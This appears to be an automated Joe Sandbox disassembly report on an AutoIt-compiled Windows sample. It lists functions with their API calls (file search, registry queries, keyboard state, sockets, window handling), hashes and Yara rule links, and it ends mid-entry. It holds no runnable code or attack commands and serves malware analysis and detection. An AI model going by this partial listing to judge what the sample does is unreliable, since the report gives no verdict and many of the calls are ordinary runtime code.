                                                              Function 00CCA0FA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00CCA11B
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00CCA176
                                                              • FindClose.KERNEL32(00000000), ref: 00CCA181
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00CCA19D
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00CCA1ED
                                                              • SetCurrentDirectoryW.KERNEL32(00D17B94), ref: 00CCA20B
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CCA215
                                                              • FindClose.KERNEL32(00000000), ref: 00CCA222
                                                              • FindClose.KERNEL32(00000000), ref: 00CCA232
                                                                • Part of subcall function 00CBE2AE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00CBE2C9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                              • String ID: *.*
                                                              • API String ID: 2640511053-438819550
                                                              • Opcode ID: 4411f5b145ee20acf76c698b7cd56beabefee1bf87a1b5ccafeb21b196c60747
                                                              • Instruction ID: 96f1829baeba5b0d1fe98f120d114f83c4ad1cdeb7964a63d1a435a54e521b90
                                                              • Opcode Fuzzy Hash: 4411f5b145ee20acf76c698b7cd56beabefee1bf87a1b5ccafeb21b196c60747
                                                              • Instruction Fuzzy Hash: 2B31F47150121E6ECB10AFA4EC4DFDE73BC9F05328F144159E825E60A0DB75DE85CA61
                                                              Function 00CDC7A3 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CDD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CDC00D,?,?), ref: 00CDD314
                                                                • Part of subcall function 00CDD2F7: _wcslen.LIBCMT ref: 00CDD350
                                                                • Part of subcall function 00CDD2F7: _wcslen.LIBCMT ref: 00CDD3C7
                                                                • Part of subcall function 00CDD2F7: _wcslen.LIBCMT ref: 00CDD3FD
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CDC89D
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00CDC908
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00CDC92C
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00CDC98B
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00CDCA46
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00CDCAB3
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00CDCB48
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00CDCB99
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00CDCC42
                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CDCCE1
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00CDCCEE
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                              • String ID:
                                                              • API String ID: 3102970594-0
                                                              • Opcode ID: b3673be54d8c382460be31513f04c59e48caffb18673bc5acbc65b0891a8f8f7
                                                              • Instruction ID: eee7e912c430d96216fc33700ac867770e773c752f872dec1f1b9a2b9aff409b
                                                              • Opcode Fuzzy Hash: b3673be54d8c382460be31513f04c59e48caffb18673bc5acbc65b0891a8f8f7
                                                              • Instruction Fuzzy Hash: 5B025C756042019FC714CF24C8D5E2ABBE5AF88314F18849EF95ACB3A2DB31ED46DB51
                                                              Function 00CBA54A Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 00CBA572
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00CBA5F3
                                                              • GetKeyState.USER32(000000A0), ref: 00CBA60E
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00CBA628
                                                              • GetKeyState.USER32(000000A1), ref: 00CBA63D
                                                              • GetAsyncKeyState.USER32(00000011), ref: 00CBA655
                                                              • GetKeyState.USER32(00000011), ref: 00CBA667
                                                              • GetAsyncKeyState.USER32(00000012), ref: 00CBA67F
                                                              • GetKeyState.USER32(00000012), ref: 00CBA691
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00CBA6A9
                                                              • GetKeyState.USER32(0000005B), ref: 00CBA6BB
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              • Opcode ID: 9399d27ccd6f15a8fac3a442df9846c51a56af7d8fb39540d024f4437611c86e
                                                              • Instruction ID: 3c8e9cdca9ccbe7273d227f4fe197a02dff91930b34067d11345d95c9e31336f
                                                              • Opcode Fuzzy Hash: 9399d27ccd6f15a8fac3a442df9846c51a56af7d8fb39540d024f4437611c86e
                                                              • Instruction Fuzzy Hash: 9C41B7B4504BC96EFF318B6088153E5BFA06F11344F08805AE5E64A1C2EB949FD8CB67
                                                              Function 00CD4089 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoInitialize.OLE32 ref: 00CD40D1
                                                              • CoUninitialize.OLE32 ref: 00CD40DC
                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00CF0B44,?), ref: 00CD4136
                                                              • IIDFromString.OLE32(?,?), ref: 00CD41A9
                                                              • VariantInit.OLEAUT32(?), ref: 00CD4241
                                                              • VariantClear.OLEAUT32(?), ref: 00CD4293
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                              • API String ID: 636576611-1287834457
                                                              • Opcode ID: 87432ba6295c098d8ebd536b51637eba0c1a210e8ca741d651e9a4cb33607a0e
                                                              • Instruction ID: be22821a538046d10d9fde68188343b1320cd373b82de3890bdaa1677182d8ae
                                                              • Opcode Fuzzy Hash: 87432ba6295c098d8ebd536b51637eba0c1a210e8ca741d651e9a4cb33607a0e
                                                              • Instruction Fuzzy Hash: 19619F71204301AFC715DF65D889B9EBBE4AF49714F10040EFA959B391DB70EE88DB92
                                                              Function 00CCA488 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                              • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00CCA4D5
                                                              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00CCA5E8
                                                                • Part of subcall function 00CC41CE: GetInputState.USER32 ref: 00CC4225
                                                                • Part of subcall function 00CC41CE: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CC42C0
                                                              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00CCA505
                                                              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00CCA5D2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                              • String ID: *.*
                                                              • API String ID: 1972594611-438819550
                                                              • Opcode ID: bcdf74ad1ac9900e559b7a91e33eaaec833ddcfd610d039a40dd6df844122ed1
                                                              • Instruction ID: 45198c95aaee1b7f8371dc7eefba8f4350527b523e21f257be9dd5b1ac6cb4c0
                                                              • Opcode Fuzzy Hash: bcdf74ad1ac9900e559b7a91e33eaaec833ddcfd610d039a40dd6df844122ed1
                                                              • Instruction Fuzzy Hash: 0E41807190020EAFCF14DF64C849FEEBBB4EF05315F24805AE815A61A1E7709F84DB61
                                                              Function 00C5225D Relevance: 7.8, APIs: 5, Instructions: 309COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DefDlgProcW.USER32(?,?), ref: 00C522EE
                                                              • GetSysColor.USER32(0000000F), ref: 00C523C3
                                                              • SetBkColor.GDI32(?,00000000), ref: 00C523D6
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Color$Proc
                                                              • String ID:
                                                              • API String ID: 929743424-0
                                                              • Opcode ID: 491f02776c2ebf3799f728e47eaa565d46a2b7e2c9141464aefa64ead315c43c
                                                              • Instruction ID: a4b1764100b2b64e8767e982a1b373b8358949c6a8b3460581647deb45c75895
                                                              • Opcode Fuzzy Hash: 491f02776c2ebf3799f728e47eaa565d46a2b7e2c9141464aefa64ead315c43c
                                                              • Instruction Fuzzy Hash: 37812AF8204194BEEA39663E8D5DE7F25CDDB43311F180109F952C55A1CB298F85E23E
                                                              Function 00CD2163 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CD39AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00CD39D7
                                                                • Part of subcall function 00CD39AB: _wcslen.LIBCMT ref: 00CD39F8
                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00CD21BA
                                                              • WSAGetLastError.WSOCK32 ref: 00CD21E1
                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00CD2238
                                                              • WSAGetLastError.WSOCK32 ref: 00CD2243
                                                              • closesocket.WSOCK32(00000000), ref: 00CD2272
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 1601658205-0
                                                              • Opcode ID: e7381a052191231ea237070bfa0805afe8334db4e86f6f771bb6fd9111c0780c
                                                              • Instruction ID: b7e7ed8c26eeeb7430911945d2395b33588d5a69bbe88f3f05d25e929c182a67
                                                              • Opcode Fuzzy Hash: e7381a052191231ea237070bfa0805afe8334db4e86f6f771bb6fd9111c0780c
                                                              • Instruction Fuzzy Hash: C251C475600200AFD720AF64C8C6F2E77E5AB45714F088089FA16AF3D3CA71AD85DBE1
                                                              Function 00CE25A0 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                              • String ID:
                                                              • API String ID: 292994002-0
                                                              • Opcode ID: 39bc4019dd86b82b4cd652e3e7bd170cf727ac5a5ac645fba8eba48a9459cf9c
                                                              • Instruction ID: f051a82c88f643c542e0cf1d156450a6ed4a3ab172209c915fc231d4e9534501
                                                              • Opcode Fuzzy Hash: 39bc4019dd86b82b4cd652e3e7bd170cf727ac5a5ac645fba8eba48a9459cf9c
                                                              • Instruction Fuzzy Hash: 0721E5313012C08FD7108F17C894B5A7B9DEF94314F188469F84ACB252DB71EE42CB90
                                                              Function 00CBEBE5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00CBEC19
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: mouse_event
                                                              • String ID: DOWN
                                                              • API String ID: 2434400541-711622031
                                                              • Opcode ID: 6c9844c2acb37f0803c085e7fa9851af787a5e27a5b5c1aaa499ff74f0634327
                                                              • Instruction ID: 814c0275bbaf1cc43ffdabd92c407752edfd80f2991400c1f9a91490ba57edbb
                                                              • Opcode Fuzzy Hash: 6c9844c2acb37f0803c085e7fa9851af787a5e27a5b5c1aaa499ff74f0634327
                                                              • Instruction Fuzzy Hash: 25E08C6A19D7223CB9182118BC02EF6038C8F26B34B51424AF851E81C0EE905E86A1B9
                                                              Function 00CE0BA0 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 00CE0C44
                                                              • _wcslen.LIBCMT ref: 00CE0C7E
                                                              • _wcslen.LIBCMT ref: 00CE0CE8
                                                              • _wcslen.LIBCMT ref: 00CE0D50
                                                              • _wcslen.LIBCMT ref: 00CE0DD4
                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00CE0E24
                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CE0E63
                                                                • Part of subcall function 00C6FD60: _wcslen.LIBCMT ref: 00C6FD6B
                                                                • Part of subcall function 00CB2ACF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CB2AE8
                                                                • Part of subcall function 00CB2ACF: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CB2B1A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                              • API String ID: 1103490817-719923060
                                                              • Opcode ID: e82b951c69b753e0df5aad151e74354f7e0078c4f0d0c5848882a55917433178
                                                              • Instruction ID: bf93b0b0d1603904a5248dd8b462bc998e7389db93e538cf112ce45172fda7b7
                                                              • Opcode Fuzzy Hash: e82b951c69b753e0df5aad151e74354f7e0078c4f0d0c5848882a55917433178
                                                              • Instruction Fuzzy Hash: BAE1E4352043819FC714DF26C88186AB3E6FF94314F24496DF8A69B392DB70EE85DB91
                                                              Function 00C524C3 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C5259A
                                                              • GetSystemMetrics.USER32(00000007), ref: 00C525A2
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C525CD
                                                              • GetSystemMetrics.USER32(00000008), ref: 00C525D5
                                                              • GetSystemMetrics.USER32(00000004), ref: 00C525FA
                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C52617
                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C52627
                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C5265A
                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C5266E
                                                              • GetClientRect.USER32(00000000,000000FF), ref: 00C5268C
                                                              • GetStockObject.GDI32(00000011), ref: 00C526A8
                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C526B3
                                                                • Part of subcall function 00C519CD: GetCursorPos.USER32(?), ref: 00C519E1
                                                                • Part of subcall function 00C519CD: ScreenToClient.USER32(00000000,?), ref: 00C519FE
                                                                • Part of subcall function 00C519CD: GetAsyncKeyState.USER32(00000001), ref: 00C51A23
                                                                • Part of subcall function 00C519CD: GetAsyncKeyState.USER32(00000002), ref: 00C51A3D
                                                              • SetTimer.USER32(00000000,00000000,00000028,00C5199C), ref: 00C526DA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                              • String ID: AutoIt v3 GUI
                                                              • API String ID: 1458621304-248962490
                                                              • Opcode ID: 2ee0b31fd1c9c80442dbe2a5a5fca6a55ec5af9ae3b62a14d26783c64f14bc8c
                                                              • Instruction ID: 5452c7e151742650b71c63697d9e7b600157bcab9bdc3be1c6933255f6b03de6
                                                              • Opcode Fuzzy Hash: 2ee0b31fd1c9c80442dbe2a5a5fca6a55ec5af9ae3b62a14d26783c64f14bc8c
                                                              • Instruction Fuzzy Hash: A8B18A75600249AFCB14DFA8CC89BAE7BA4EB48315F114229FE16EA290D770D981CF54
                                                              Function 00CE8C9B Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00CE8CB9
                                                              • _wcslen.LIBCMT ref: 00CE8CCD
                                                              • _wcslen.LIBCMT ref: 00CE8CF0
                                                              • _wcslen.LIBCMT ref: 00CE8D13
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CE8D51
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00CE6551), ref: 00CE8DAD
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CE8DE6
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00CE8E29
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CE8E60
                                                              • FreeLibrary.KERNEL32(?), ref: 00CE8E6C
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CE8E7C
                                                              • DestroyIcon.USER32(?,?,?,?,?,00CE6551), ref: 00CE8E8B
                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CE8EA8
                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CE8EB4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                              • String ID: .dll$.exe$.icl
                                                              • API String ID: 799131459-1154884017
                                                              • Opcode ID: 7f3c715bbc2fe3b704a08d8a1b169814f8423cfb519f1cae5ebf8ae0bec58dd7
                                                              • Instruction ID: 6f3a742ecbbc5d73a7adc51a427bd9dc1d4f15791ed4b610ef30d8e89c832849
                                                              • Opcode Fuzzy Hash: 7f3c715bbc2fe3b704a08d8a1b169814f8423cfb519f1cae5ebf8ae0bec58dd7
                                                              • Instruction Fuzzy Hash: 3461DEB1500255BEEB14DF65CC81BBE77A8BB08711F108506F929DA1D0DFB59A88DBA0
                                                              Function 00CC47D3 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?), ref: 00CC4852
                                                              • _wcslen.LIBCMT ref: 00CC485D
                                                              • _wcslen.LIBCMT ref: 00CC48B4
                                                              • _wcslen.LIBCMT ref: 00CC48F2
                                                              • GetDriveTypeW.KERNEL32(?), ref: 00CC4930
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CC4978
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CC49B3
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CC49E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
